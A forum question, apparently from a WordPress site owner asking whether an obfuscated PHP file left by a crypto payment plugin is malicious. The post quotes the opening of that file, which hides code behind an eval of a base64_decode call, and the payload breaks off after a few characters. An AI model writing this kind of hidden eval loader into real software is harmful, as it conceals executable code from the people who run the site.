Suspicious script running on WordPress after installing gourl.io
I recently installed this bitcoin / crypto payment gateway from WooCommerce that seems to have some good reviews. There is a file that I am not sure what it is and I seem to have some running scripts running. Here is a sample of the code.
My username on my VPS is robotinsight.
The Obstructed php file looks like this:
<?php /* Obfuscation provided by FOPO - Free Online PHP Obfuscator: http://www.fopo.com.ar/ This code was created on Friday, October 27th, 2017 at 8:53 UTC from IP 188.8.131.52 Checksum: f8ae2f3fcc05f04aece9ca0e0e21c64f25c4f0d6 */ $c1201518="\142\x61\163\145\66\64\137\144\x65\143\157\144\x65";@eval($c1201518( "Ly9OS3RIdStmU3gwbmx1L1ZXb2xVbDN5c0JQSHd4MnJKWW9rS3V4WFJVZk5SQXFuRFVpYitGU243Z1